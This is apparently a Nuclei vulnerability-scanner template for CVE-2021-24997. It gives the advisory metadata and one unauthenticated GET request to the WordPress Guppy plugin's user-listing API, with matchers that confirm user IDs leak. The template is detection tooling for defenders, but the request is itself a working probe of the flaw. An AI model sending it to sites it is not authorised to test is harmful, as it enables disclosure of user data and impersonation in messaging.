id: CVE-2021-24997

info:
  name: Wordpress Guppy <=1.1 - User ID Disclosure
  author: Evan Rubinstein
  severity: medium
  description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackers to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
  reference:
    - https://www.exploit-db.com/exploits/50540
    - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24997
    - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-24997
    cwe-id: CWE-862
  tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"guppyUsers":'
          - '"userId":'
          - '"type":'
        condition: and